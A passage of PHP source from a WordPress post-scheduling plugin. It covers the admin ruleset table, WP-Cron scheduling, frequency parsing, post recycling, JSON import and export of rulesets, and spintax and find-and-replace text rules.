<?php echo '<img width="28" height="28" alt="Saved Rulesets" title="Saved Rulesets" src="' . $this->getPluginUrl() . '/images/wap-saved.png" />'; ?>
 Saved Rulesets
</h3>
<div class="divTable wapTable">
<div class="divTableHeading">
<div class="divTableRow">
<div class="divTableHead"><?php
			esc_html_e( 'ID'  );
?></div>
<div class="divTableHead divTableNoWrap"><?php
			esc_html_e( 'Status'  );
?> <span class='divTableHeadSmall'><?php
			echo htmlentities( $timeNow );
?></span></div>
<div class="divTableHead"><?php
			esc_html_e( 'Name'  );
?></div>
<div class="divTableHead"><?php
			esc_html_e( 'Frequency'  );
?></div>
<div class="divTableHead"><?php
			esc_html_e( 'Action'  );
?></div>
</div>
</div>
<div class="divTableBody">
		<?php
			$editId = $this->getVarID();
			foreach ( $this->options[ 'Rulesets' ] as $ruleset ) {
				if ( !is_array( $ruleset ) )
					continue;
				$id     = isset( $ruleset[ 'ID' ] ) ? (int) $ruleset[ 'ID' ] : '?';
				$active = $editId === $id ? 'divRulesetActive' : '';
				$status = $statusShow = isset( $ruleset[ 'Status' ] ) ? $ruleset[ 'Status' ] : 'disabled';
				if ( $status === 'Enabled' ) {
					$eventTime = $this->getRulesetEventTime( $ruleset[ 'ID' ] );
					if ( $eventTime ) {
						$statusShow .= ' - ' . $eventTime;
						$statusShow = '<span class="divRulesetEnabled">' . $status . '</span>';
					}
				}
				$name       = isset( $ruleset[ 'Name' ] ) ? $ruleset[ 'Name' ] : '';
				$freq       = isset( $ruleset[ 'Frequency' ] ) ? $ruleset[ 'Frequency' ] : '?';
				$btnEditUrl = sprintf( 'admin.php?page=%sSettings&editRuleset=%s', htmlentities( $this->getClassName() ), htmlentities( $id ) );
				$btnEnableUrl = sprintf( 'admin.php?page=%sSettings&enableRuleset=%s', htmlentities( $this->getClassName() ), htmlentities( $id ) );
				$btnDisableUrl = sprintf( 'admin.php?page=%sSettings&disableRuleset=%s', htmlentities( $this->getClassName() ), htmlentities( $id ) );
				$btnDelUrl  = sprintf( 'admin.php?page=%sSettings&delRuleset=%s', htmlentities( $this->getClassName() ), htmlentities( $id ) );
				$btnExportUrl  = sprintf( 'admin.php?page=%sSettings&exportRuleset=%s', htmlentities( $this->getClassName() ), htmlentities( $id ) );
?>
<div class="divTableRow">
<div class="divTableCell <?php
				echo htmlentities( $active );
?>"><?php
				echo htmlentities( $id );
?></div>
<div class="divTableCell divTableNoWrap <?php
				echo htmlentities( $active );
?>"><?php
				if ( $status === 'Enabled' )
					echo '<span class="divRulesetEnabled">';
				echo htmlentities( $statusShow );
				if ( $status === 'Enabled' )
					echo '</span>';
?></div>
<div class="divTableCell divTableFull <?php
				echo htmlentities( $active );
?>">
<a href="<?php
				echo esc_url( $btnEditUrl );	// nonce not needed
?>">
<?php
				echo htmlentities( $name );
?></a></div>
<div class="divTableCell <?php
				echo htmlentities( $active );
?>"><?php
				echo htmlentities( $freq );
?></div>
<div class="divTableCell divTableNoWrap <?php
				echo htmlentities( $active );
?>">

<a href="<?php
				echo esc_url( $btnEditUrl );	// nonce not needed
?>"><img width="16" height="16" alt="Edit this Ruleset" title="Edit this Ruleset" src="<?php
				echo esc_url( $this->getPluginUrl() );
?>/images/list_edit.png"></a>

<?php				if ( $status === 'Enabled' ) { ?>
<a href="<?php
				echo wp_nonce_url( $btnDisableUrl, 'DISABLERULESET=' . htmlentities( $id )  . '_nonce' );
?>"><img width="16" height="16" alt="Disable this Ruleset" title="Disable this Ruleset" src="<?php
				echo esc_url( $this->getPluginUrl() );
?>/images/disable.png"></a>
<?php } else { ?>

<a href="<?php
				echo wp_nonce_url( $btnEnableUrl, 'ENABLERULESET=' . htmlentities( $id )  . '_nonce' );
?>"><img width="16" height="16" alt="Enable this Ruleset" title="Enable this Ruleset" src="<?php
				echo esc_url( $this->getPluginUrl() );
?>/images/enable.png"></a>
<?php } ?>

<a href="<?php
				echo wp_nonce_url( $btnExportUrl, 'EXPORTRULESET=' . htmlentities( $id )  . '_nonce' );
?>"><img width="16" height="16" alt="Export this Ruleset" title="Export this Ruleset" src="<?php
				echo esc_url( $this->getPluginUrl() );
?>/images/export.png"></a>

<a href="<?php
				echo wp_nonce_url( $btnDelUrl, 'DELETERULESET=' . htmlentities( $id )  . '_nonce' );
?>"><img width="16" height="16" alt="Delete this Ruleset" title="Delete this Ruleset" src="<?php
				echo esc_url( $this->getPluginUrl() );
?>/images/list_remove.png"></a>

</div>
</div>
		<?php
			}
?>
</div>
</div>
		<?php 
			// Noteworthy messages:
			if ( defined( 'DISABLE_WP_CRON' ) ) {
				printf(
				'<small>%s <a target="_blank" href="%s">%s</a> %s</small>',
				esc_html__( 'WP-Cron not detected. Enabled rulesets should trigger when a '  ),
				esc_url( 'https://www.google.com/search?q=wordpress+server+cron+job' ),
				esc_html__( 'server cron job'  ),
				esc_html__( 'calls wp-cron directly after their scheduled event time.'  )
				);
			}
			else {
				printf(
				'<small><a target="_blank" href="%s">%s</a> %s</small>',
				esc_url( 'https://developer.wordpress.org/plugins/cron/' ),
				esc_html__( 'WP-Cron'  ),
				esc_html__( ' detected. Enabled rulesets should trigger on first page load after their scheduled event time.'  )
				);
			}
			if ( is_plugin_active( 'w3-total-cache/w3-total-cache.php' ) ) {
				printf(
				'<br><small><a target="_blank" href="%s">%s</a> %s</small>',
				esc_url( 'https://wordpress.org/plugins/w3-total-cache/' ),
				esc_html__( 'W3 Total Cache'  ),
				esc_html__( ' detected. Note: If its Object Cache is enabled it will mess up the cron transient.'  )
				);
			}
			// only needed until WP 5.9 release
			if ( version_compare(PHP_VERSION, '8.0', '>=') 
				&& version_compare( $GLOBALS['wp_version'], '5.9-alpha', '<' )
			) {
				printf(
				'<br><br><small><strong>%s %s <a target="_blank" href="%s">%s %s</a>%s</strong><br>(%s)</small>',
				esc_html__( 'NOTE: WordPress '  ),
				$wp_version,
				esc_url( 'https://developer.yoast.com/blog/the-2020-wordpress-and-php-8-compatibility-report/' ),
				esc_html__( 'is not fully compatible with PHP'  ),
				PHP_VERSION,
				esc_html__( ', which might cause WAP events to fail. Recommend upgrading.'  )
				);
			}
		}
?>

		<p>

		<?php
			$id = $this->getVarID();
			if ( $id ) {
?>
			<input type="submit" class="button-primary" name="wapAction"
				formaction="admin.php?page=<?php
				echo htmlentities( $this->getClassName() ) . 'Settings';
?>"
				value="<?php
				esc_html_e( 'New Ruleset'  );
?>"/>
			&nbsp; &nbsp; &nbsp; or &nbsp; &nbsp; &nbsp;
		<?php
			}
?>
		<input type="submit" name="wapAction"
    			value="<?php 
				esc_html_e( "Import Ruleset"  );
?>"/>
		<input type="file" id="wap_import_file" name="wap_import_file" accept=".json">
		</p>
		<hr>
		<?php
	}
	
	/**
	 * Get the global var rulesetID, either from the _POST or _GET environment, depending on action
	 * @return the ID or null
	 */
	protected function getVarID() {
		if ( isset( $_GET[ 'editRuleset' ] ) )
			$id = filter_input( INPUT_GET, 'editRuleset', FILTER_VALIDATE_INT );
		else if ( isset( $_GET[ 'enableRuleset' ] ) )
			$id = filter_input( INPUT_GET, 'enableRuleset', FILTER_VALIDATE_INT );
		else if ( isset( $_GET[ 'disableRuleset' ] ) )
			$id = filter_input( INPUT_GET, 'disableRuleset', FILTER_VALIDATE_INT );
		else if ( isset( $_GET[ 'exportRuleset' ] ) )
			$id = filter_input( INPUT_GET, 'exportRuleset', FILTER_VALIDATE_INT );
		else if ( isset( $_POST[ 'ID' ] ) 
			&& isset( $_POST[ 'wapAction' ] ) 
			&& in_array( $_POST[ 'wapAction' ], array( 'Enable Ruleset', 'Disable Ruleset', 'Run Once', 'Save Changes', 'Delete Ruleset' ) )
		)
			$id = filter_input( INPUT_POST, 'ID', FILTER_VALIDATE_INT );
		else
			$id = null;

		if ( ! $this->getRuleset( $id ) )
			$id = null;

		return $id;
	}
	
	/**
	 * Display custom data at the header of a tab
	 * @param $tabID string sanitized name of this tab (lowercase, hyphens instead of spaces)
	 */
	public function tabHeader( $tabID ) {
		if ( $tabID === 'wp-auto-poster-tab-rulesets' ) {
			$this->showRulesets();
			$id = $this->getVarID();
			if ( $id ) {
				echo '<h3>';
				echo '<img width="28" height="28" alt="Edit Ruleset" title="Edit Ruleset" src="' . $this->getPluginUrl() . '/images/wap-edit.png" />';
				echo ' Edit Ruleset #' . $id;
				echo '</h3>';
			}
			else {
				echo '<h3>';
				echo '<img width="28" height="28" alt="Create new Ruleset" title="Create new Ruleset" src="' . $this->getPluginUrl() . '/images/wap-create.png" />';
				echo ' Create new Ruleset';
				echo '</h3>';
			}
		} else if ( $tabID === 'wp-auto-poster-tab-general' ) {
			printf( esc_html__( '%sThis Ruleset will be checked every time it is triggered by the Event Frequency%s'  ), '<h4><i>', '</i></h4>' );
		} else if ( $tabID === 'wp-auto-poster-tab-post-conditions' ) {
			printf( esc_html__( '%sWordPress function WP_Query will be called with these settings to find any eligible posts%s'  ), '<h4><i>', '</i></h4>' );
		} else if ( $tabID === 'wp-auto-poster-tab-post-actions' ) {
			printf( esc_html__( '%sWhat to modify when eligible posts are found%s'  ), '<h4><i>', '</i></h4>' );
		} else if ( $tabID === 'wp-auto-poster-tab-post-recycling' ) {
			printf( esc_html__( '%sCan recycle old content if not enough eligible posts are found%s'  ), '<h4><i>', '</i></h4>' );
		} else if ( $tabID === 'wp-auto-poster-tab-license' ) {
			printf( esc_html__( '%sLicense info will be sent to the Envato API to verify purchase, and check for updates on author\'s server%s'  ), '<h4><i>', '</i></h4>' );
		}
	}
	
	/**
	 * Display custom data at the footer of a tab
	 * @param $tabID string sanitized name of this tab (lowercase, hyphens instead of spaces)
	 */
	public function tabFooter( $tabID ) {
		
		if ( $tabID === 'wp-auto-poster-tab-logs' ) {
			$this->showLogMessages();
?>
			<p>
			<input type="submit" class="button-primary" name="wapAction"
				value="<?php
			esc_html_e( 'Clear Logs'  );
?>"/>
			</p>
<?php
		}
		
	}
	
	/**
	 * Save new event time in Ruleset subIndex
	 * @param $ruleset array to update
	 */
	private function getRulesetEventTime( $rulesetID ) {
		
		$args     = array(
			(int) $rulesetID 
		);
		$hookname = $this->getPluginTextDomain();
		
		$scheduledtime = wp_next_scheduled( $hookname, $args );

		if ( false === $scheduledtime ) {
			// not found!? should not happen.
			$this->addLogMessage( sprintf( esc_html__( 'Warning - Could not find cron schedule entry for %s, %s. Likely another plugin overwrote cron entries.'  ), $hookname, print_r( $args, true ) ) );
			$this->disableRuleset( $rulesetID, true );
			return null;
		}
		$formatted = date( "Y-m-d H:i:s", $scheduledtime + ( get_option( 'gmt_offset' ) * HOUR_IN_SECONDS ) ) . " " . get_option( 'timezone_string' );

		return 'Next event after ' . $formatted;
	}
	
	/**
	 * restart all enabled Rulesets
	 */
	protected function restartRulesets() {
		$rulesets = $this->getOption( 'Rulesets', array ());
		foreach ( $rulesets as $ruleset ) {
			if ( !empty( $ruleset[ 'Frequency' ] ) && isset( $ruleset[ 'Status' ] ) && false !== stripos( $ruleset[ 'Status' ], 'Enabled' ) ) {
				$this->enableRuleset( $ruleset[ 'ID' ] );
			}
		}
	}

	/**
	 * Enable ruleset by setting event in cron schedule
	 * @param $rulesetID number of the ruleset to enable
	 * @param $restart boolean whether we are restarting an existing event
	 */
	protected function enableRuleset( $rulesetID = null, $restart = false ) {
		
		$support = $this->getOption( 'Support' );
	
		
		if ( !$rulesetID )
			$rulesetID = $this->getVarID();
		
		$ruleset = $this->getRuleset( $rulesetID );
		if ( !$ruleset )
			return;
		
		$args     = array(
			(int) $rulesetID 
		);
		$hookname = $this->getPluginTextDomain();
		wp_clear_scheduled_hook( $hookname, $args );
		
		$customRecurrence = $this->getPluginTextDomain() . '-' . $rulesetID;
		
		if ( empty( $ruleset[ 'Frequency' ] ) ) {
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error on ruleset %s - Event Frequency is empty.'  ), $rulesetID ) );
			return;
		}
		
		$delay = true === $restart ? $this->convertTime( $ruleset[ 'Frequency' ], false ) : $this->convertTime( $ruleset[ 'Frequency' ], true );
		$delay = apply_filters( $this->getPluginTextDomain() . '-delay-time', $delay, $ruleset );
		
		$ruleset[ 'Status' ] = sprintf( esc_html__( 'Enabled'  ) );
		$timeInSecs = $this->convertTime( $ruleset[ 'Frequency' ] );
		$timeInSecs = apply_filters( $this->getPluginTextDomain() . '-epoch-time', $timeInSecs, $ruleset );
		$ruleset[ 'timeInSecs' ] = $timeInSecs;

		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, Ruleset frequency %s converted to %s seconds.'  ), __FUNCTION__, $ruleset['Frequency'], $ruleset['timeInSecs'] ) );
		$this->addUpdateSubIndex( 'Rulesets', $ruleset, true );

		$schedules = wp_get_schedules();
		
		if ( !isset( $schedules[ $customRecurrence ] ) )
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error - Could not find cron schedule entry for %s. Likely another plugin overwrote cron entries. wp_get_schedules returned: %s'  ), $customRecurrence, print_r($schedules,true) ) );
		else if ( wp_next_scheduled( $hookname, $args ) )
			$this->addLogMessage( sprintf( esc_html__( 'Notice - Cron entry already found for %s 
(%s).'  ), $hookname, print_r($args,true) ) );
		else if ( false !== wp_schedule_event( time() + $delay, $customRecurrence, $hookname, $args ) ) {
			if ( true === $restart )
				$this->addLogMessage( sprintf( esc_html__( 'A post has been published outside of WAP. Restart on Publish is checked, so Ruleset #%s event has been restarted.'  ), $rulesetID ) );
			else
				$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s has been enabled with hookname [%s], custom schedule: [%s], args: %s.'  ), $rulesetID, $hookname, $customRecurrence, print_r($args,true) ) );
			return;
		} else
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error - wp_schedule_event() for ruleset #%s failed because a plugin disallowed this event.'  ), $rulesetID ) );
		
		// if here the event was not scheduled - set Status back to disabled

		$this->addUpdateSubIndex( 'Rulesets', $ruleset, true );
	}
	
	/**
	 * Disable ruleset by clearing event in cron schedule
	 * @param $rulesetID number of the ruleset to disable
	 */
	protected function disableRuleset( $rulesetID = null, $save = false ) {
		if ( !$rulesetID )
			$rulesetID = $this->getVarID();
		
		$ruleset = $this->getRuleset( $rulesetID );
		if ( !$ruleset )
			return;
		
		// if Ruleset is not enabled just return
	
		
		$args     = array(
			(int) $rulesetID 
		);
		$hookname = $this->getPluginTextDomain();
		wp_clear_scheduled_hook( $hookname, $args );
		
		$ruleset[ 'Status' ] = sprintf( esc_attr__( 'disabled'  ) );
		$this->addUpdateSubIndex( 'Rulesets', $ruleset, $save );
		$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s has been disabled.'  ), $rulesetID ) );
	}
	
	/**
	 * Convert Frequency format into seconds
	 * @param $frequency string the format such as "1d", "2h", "30m", "1d10h30m" etc.
	 * Can also handle time ranges such as "10h-20h", etc.
	 * Can also handle an initial delay time such as "5h+10h", etc.
	 */
	protected function convertTime( $frequency, $returnDelay = false ) {

		if ( empty( $frequency ) ) {
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error - Event Frequency is empty.'  ) ) );
			return 0;
		}

		// if more than one Frequency, choose 1 at random
		$matches = explode( ',', $frequency );
		shuffle( $matches );
		$frequency = $matches[0];
		$frequency = trim( $frequency );
		
		// first check for delay time, if any
		$matches = explode( '+', $frequency );
		if ( isset( $matches[ 1 ] ) ) {
			// note: delay does not support 'hourly', 'daily', etc.
			if ( true === $returnDelay )
				return $this->convertTime( $matches[ 0 ] );
			else
				return $this->convertTime( $matches[ 1 ] );
		} else {
			if ( true === $returnDelay )
				return 0;
		}
		
		// first check for time range, if any
		$matches = explode( '-', $frequency );
		if ( isset( $matches[ 1 ] ) ) {
			// note: range does not support 'hourly', 'daily', etc.
			$begin = $this->convertTime( $matches[ 0 ] );
			$end   = $this->convertTime( $matches[ 1 ] );
			if ( $begin <= $end )
				$secs = mt_rand( $begin, $end );
			else
				$secs = mt_rand( $end, $begin );
		} else {
			// recognize standard WordPress values
			if ( $frequency === 'daily' )
				return DAY_IN_SECONDS;
			else if ( $frequency === 'twicedaily' )
				return DAY_IN_SECONDS / 2;
			else if ( $frequency === 'hourly' )
				return HOUR_IN_SECONDS;
			
			$secs = 0;
			if ( preg_match( "/(\d+)\s*d/", $frequency, $matches ) )
				$secs += $matches[ 1 ] * DAY_IN_SECONDS;
			if ( preg_match( "/(\d+)\s*h/", $frequency, $matches ) )
				$secs += $matches[ 1 ] * HOUR_IN_SECONDS;
			if ( preg_match( "/(\d+)\s*m/", $frequency, $matches ) )
				$secs += $matches[ 1 ] * MINUTE_IN_SECONDS;
			if ( preg_match( "/(\d+)\s*s/", $frequency, $matches ) )
				$secs += $matches[ 1 ];
		}

		if ( ! $secs ) {
			$this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: Unknown time format: "%s". Ignored.'  ), __FUNCTION__, $frequency ) );
		}
		return $secs;
	}
	
	/**
	 * Add enabled Rulesets to cron schedules
	 * If using a Frquency range (4h-6h), the interval at the time of wp_schedule_event will be used
	 * @param $rulesetID number of the ruleset to enable
	 */
	public function addToCronSchedules( $schedules ) {

		$rulesets = $this->getOption( 'Rulesets', array ());
		foreach ( $rulesets as $ruleset ) {
			if ( !empty( $ruleset[ 'Frequency' ] ) && isset( $ruleset[ 'Status' ] ) && false !== stripos( $ruleset[ 'Status' ], 'Enabled' ) ) {
				// add event to cron schedule
				$timeInSecs                     = isset( $ruleset[ 'timeInSecs' ] ) ? $ruleset[ 'timeInSecs' ] : $this->convertTime( $ruleset[ 'Frequency' ] );
				$customRecurrence               = $this->getPluginTextDomain() . '-' . $ruleset[ 'ID' ];
				$schedules[ $customRecurrence ] = array(
					'interval' => $timeInSecs,
					'display' => $customRecurrence 
				);
			}
		}
		return $schedules;
	}
	
	/**
	 * If a post is published, check rulesets to see if any events should be restarted.
	 * transition must be from non-publish to publish
	 * @param $new_status string the new transition status
	 * @param $old_status string the old transition status
	 * @param $post the post object
	 */
	public function restartRulesetEvent( $new_status, $old_status, $post ) {
		if ( $new_status !== 'publish' 
			|| $old_status === 'publish' 
			|| $this->getVarID()
		) {
			return;
		}
		$post_type = get_post_type( $post->ID );
		$rulesets = $this->getOption( 'Rulesets', array () );
		foreach ( $rulesets as $ruleset ) {
			$post_types = isset( $ruleset[ 'RestartOnPublish' ] ) ? $ruleset[ 'RestartOnPublish' ] : null;
			if ( isset( $ruleset[ 'Status' ] ) 
				&& false !== stripos( $ruleset[ 'Status' ], 'Enabled' ) 
				&& isset( $ruleset[ 'RestartOnPublish' ] ) 
			) {
				// option was a string up to v1.5
				if ( is_string( $ruleset[ 'RestartOnPublish' ] ) && $ruleset[ 'RestartOnPublish' ] !== 'on' ) {
					continue;
				}
				// option is an array after v1.5
				else if ( is_array( $ruleset[ 'RestartOnPublish' ] ) && ! in_array( $post_type, $ruleset[ 'RestartOnPublish' ] ) ) {
					continue;
				}
				if ( $this->getOption( 'DebugMode' ) === 'on' ) {
					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, post %d old_status: %s, new_status: %s. Ruleset %s restarting.'  ), __FUNCTION__, $post->ID, $old_status, $new_status, $ruleset[ 'ID' ] ) );
				}
				$this->enableRuleset( $ruleset[ 'ID' ], true );

			}
		}
	}
	
	/**
	 * Ruleset triggered so check all its rules and process
	 * @param $rulesetID number of the ruleset triggered
	 */
	public function processRuleset( $rulesetID, $runOnce = false ) {
	

		if ( !$runOnce && !$this->verifySingleCronEvent( $rulesetID ) )
			return;
		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, Ruleset #%s triggered by PID %d. Checking conditions: %s'  ), __FUNCTION__, $rulesetID, getmypid(), print_r( $this->getRuleset( $rulesetID ), true ) ) );

		// first see if eventFrequency is ranged (i.e. 4h-6h) or has been changed, 
		// and we have to update the cron schedule time for next trigger.
		$ruleset = $this->getRuleset( $rulesetID );

		$timeInSecs = $this->convertTime( $ruleset[ 'Frequency' ] );
		$timeInSecs = apply_filters( $this->getPluginTextDomain() . '-epoch-time', $timeInSecs, $ruleset );
		if ( ! isset( $ruleset['timeInSecs'] ) || $timeInSecs !== $ruleset['timeInSecs'] ) {
			$ruleset[ 'timeInSecs' ] = $timeInSecs;
			$this->addUpdateSubIndex( 'Rulesets', $ruleset, true );
		}
		
		// check for Inclusions
		$inclusions = $this->getRulesetOption( $rulesetID, 'Inclusions', null );
		if ( false === $this->passedDateRules( $inclusions, 'inclusions' ) ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, inclusion dateRules [%s] failed.'  ), $rulesetID, $inclusions ) );
			return;
		} else if ( !empty( $inclusions ) && $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, inclusion dateRules [%s] passed.'  ), $rulesetID, $inclusions ) );
		
		// check for Exclusions
		$exclusions = $this->getRulesetOption( $rulesetID, 'Exclusions', null );
		if ( false === $this->passedDateRules( $exclusions, 'exclusions' ) ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, exclusion dateRules [%s] failed.'  ), $rulesetID, $exclusions ) );
			return;
		} else if ( !empty( $exclusions ) && $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - Ruleset #%s, exclusion dateRules [%s] passed.'  ), $rulesetID, $exclusions ) );
		
		// check Max Posts per Day first
		$max_per_day = $this->getRulesetOption( $rulesetID, 'MaxDailyPosts', null );
		$posts_today = 0;
		$today       = date( 'd', current_time( "timestamp" ) );
		if ( true === $this->reachedMaxPerDay( $rulesetID, $max_per_day, $posts_today, $today ) )
			return;
		
		$eligible_posts = $this->queryRulesetPosts( $rulesetID );
		
		// post actions:
		$num = 0;
		foreach ( $eligible_posts as $post ) {
			$num++;
			$this->updatePost( $post, $rulesetID, $max_per_day, $posts_today, $today, 'None', $num );
		}
		
		// post recycling:
		$recycleMode   = $this->getRulesetOption( $rulesetID, 'RecycleMode', 'None' );
		$max_per_query = $this->getRulesetOption( $rulesetID, 'MaxNumberPosts', 1 );
		$count         = count( $eligible_posts );
		if ( $recycleMode != 'None' && ( !$max_per_day || $posts_today < $max_per_day ) && $count <= $max_per_query ) {
			// now recycle any eligible posts found
			$recycle_posts = $this->queryRulesetPosts( $rulesetID, $recycleMode );
			$method = $this->getRulesetOption( $rulesetID, 'RecycleMethod', 'Republish' );
			$num = 0;
			foreach ( $recycle_posts as $post ) {
				$num++;
				if ( $method === 'Clone' || $method === 'Replace' ) {
					$new_id = $this->clonePost( $post, $rulesetID );
					$new_post = $new_id ? get_post( $new_id ) : null;
					$this->recyclePost( $new_post, $rulesetID, $max_per_day, $posts_today, $today, $recycleMode, $num );
					if ( $method === 'Replace' && $new_post ) {
						wp_trash_post( $post->ID );
						if ( $this->getOption( 'DebugMode' ) === 'on' )
							$this->addLogMessage( sprintf( esc_html__( 'Ruleset #%s, %s post id %s sent to trash. Title: %s.'  ), $rulesetID, $post->post_status, "<a target='_blank' href='" . get_post_permalink( $post->ID ) . "'>" . $post->ID . "</a>", $post->post_title ) );
					}
				}
				else {
					$this->recyclePost( $post, $rulesetID, $max_per_day, $posts_today, $today, $recycleMode, $num );
				}
			}
		}
	}
	
	/**
	 * Ruleset triggered so check all its rules and process
	 * @param $rulesetID number of the ruleset triggered
	 */
	protected function importRuleset() {

		$file = $_FILES[ 'wap_import_file' ];
		$filename = $file[ 'name' ];

		if ( empty ( $filename ) )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: No file chosen.'  ), __FUNCTION__ ) );

		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, file is: %s'  ), __FUNCTION__, $filename ) );

		if ( $file[ "type" ] != "application/json" )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: File type detected: "%s" but "application/json" required.'  ), __FUNCTION__, $file[ "type" ] ) );

		if ( $file[ "error" ] > 0 )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: Code: "%s". "application/json" exptected.'  ), __FUNCTION__, $file[ "error" ] ) );

		$data = file( $file[ "tmp_name" ] );
		$importRuleset = (array) json_decode( $data[0] );

		if ( empty( $importRuleset ) )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: No data found. FILE: %s.'  ), __FUNCTION__, print_r($file, true) ) );

		// Set Defaults
		$importRuleset[ 'ID' ]  = $this->options[ 'nextID' ] = $this->getOption( 'nextID', 1 );


		$this->addUpdateSubIndex( 'Rulesets', $importRuleset );
		$this->options[ 'nextID' ]++;
		update_option( $this->getClassName(), $this->options );
		do_action( $this->getPluginTextDomain() . '-saved' );

		$this->addLogMessage( sprintf( esc_html__( 'Import Successful. Ruleset data: %s'  ), print_r( $importRuleset, true ) ) );

	}

	/**
	 * Ruleset triggered so check all its rules and process
	 * @param $rulesetID number of the ruleset triggered
	 */
	protected function exportRuleset( $rulesetID ) {
		$filename = "wap-ruleset-" . $rulesetID . "-" . date('Y-m-d') . '.json';

		header( "Content-Description: File Transfer" );
		header( "Content-Disposition: attachment; filename={$filename}" );
		header( "Content-Type: application/json; charset=utf-8" );

		$ruleset = $this->getRuleset( $rulesetID );
		echo json_encode( $ruleset ) . PHP_EOL;

		die();
	}

	/**
	 * Simple spintax for the given string like "{Check|Watch} this {awesome|great|amazing} video"
	 */
	private function spintax( $s ) {
		preg_match( '#\{(.+?)\}#uis', $s, $m );
		if ( empty( $m ) ) {
			return $s;
		}
		$t = $m[1];
		if ( strpos( $t, '{' ) !== FALSE ) {
			$t = mb_substr ($t, mb_strrpos($t,'{') + 1 );
		}
		$parts = explode( "|", $t );
		$s = preg_replace( "+\{".preg_quote($t)."\}+is", $parts[array_rand($parts)], $s, 1 );
		return $this->spintax( $s );
	}

	/**
	 * find and replace phrases 
	 */
	private function findReplace( $the_rules, $the_data, $for = 'unknown' ) {
		if ( empty( $the_data ) ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, %s was empty! Skipping.'  ), __FUNCTION__, $for ) );
			return $the_data;
		}

		// re pattern for REMOVE_SENTENCE.
			$re = '/# Split sentences on whitespace between them.
    				(?<=                # Begin positive lookbehind.
      				[.!?]               # Either an end of sentence punct
    				| [.!?][\'"]        # or end of sentence punct and quote.
				| \n                # or a line break,
    				)                   # End positive lookbehind.
    				(?<!                # Begin negative lookbehind.
      				Mr\.                # Skip either "Mr."
    				| Mrs\.             # or "Mrs.",
    				| Ms\.              # or "Ms.",
    				| Jr\.              # or "Jr.",
    				| Dr\.              # or "Dr.",
    				| Prof\.            # or "Prof.",
    				| Sr\.              # or "Sr.",
				| \s\w\.            # an initial like in "First M. Last"
				| \s\w\.\w\.        # double initial like in "F.M. Last"
				| \s\w.\w\.\w\.     # triple initial like in "F.M.L."
    				)                   # End negative lookbehind.
    				(\s+)               # Split on whitespace between sentences.
    				/mix';

		$rules = explode( PHP_EOL, $the_rules );
		foreach ( $rules as $rule ) {
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, Processing rule: %s.'  ), __FUNCTION__, $for, $rule ) );
			// check for blank line and missing separator
			if ( empty( $rule ) || false === strpos( $rule, '=>' ) ) {
				if ( $this->getOption( 'DebugMode' ) === 'on' )
					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, rule was empty or missing [=>] separator!'  ), __FUNCTION__, $for ) );
				continue;
			}

			$spinrule = explode( '=>', $rule );
			$regex = '~(?![^<]*>)\b' . preg_quote( trim( $spinrule[0] ) ) . '\b~iu';
			$search = trim( $spinrule[0] );
			$replace =  trim( $spinrule[1] );

			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, searching for pattern [%s] to replace with [%s].'  ), __FUNCTION__, $for, htmlentities( $search) , $replace ) );

			// any special command>?
			if ( $replace === 'REMOVE_SENTENCE' ) {
				$sentences = preg_split( $re, $the_data, -1, PREG_SPLIT_DELIM_CAPTURE );
				for ( $i=0; $i < count( $sentences ); ++$i ) {
					if ( preg_match( $regex, $sentences[$i] ) ) {
						$sentences[$i] = '';
					}
				}
				$result = implode( $sentences );
			}
			else if ( false !== strpos( $replace, 'DATE_FORMAT' ) ) {
				if ( preg_match( '%\(([^\)]+)\)%', $replace, $matches ) ) {
					$format = $matches[1];
				}
				else {
					$format = get_option( 'date_format' );
				}
				$date = date( $format );
				$result = str_replace( $search, $date, $the_data );
			}
			else if ( false !== strpos( $replace, 'TIME_FORMAT' ) ) {
				if ( preg_match( '%\(([^\)]+)\)%', $replace, $matches ) ) {
					$format = $matches[1];
				}
				else {
					$format = get_option( 'time_format' );
				}
				$time = date( $format );
				$result = str_replace( $search, $time, $the_data );
			}
			else {

				// is there spintax? figure out spintax replacement ahead of time
				$spintax = $this->spintax( $replace );
				if ( $spintax != $replace ) {
					$replace = trim( $spintax );
				}

				// custom function to keep cases after replacing.
				$result = preg_replace_callback( $regex, function( $matches ) use ( $replace ) {
					$i=0;
					return implode('', array_map( function($char) use ($matches, &$i ) {
						return isset( $matches[0][$i] ) && ctype_upper( $matches[0][$i++] ) ? strtoupper( $char ) : strtolower( $char );
					}, str_split( $replace )));
				}, $the_data );

			} // end else

			// any changes made by this Find and Replace rule?
			if ( ! empty ( $result ) && $result != $the_data ) {
				if ( $this->getOption( 'DebugMode' ) === 'on' )
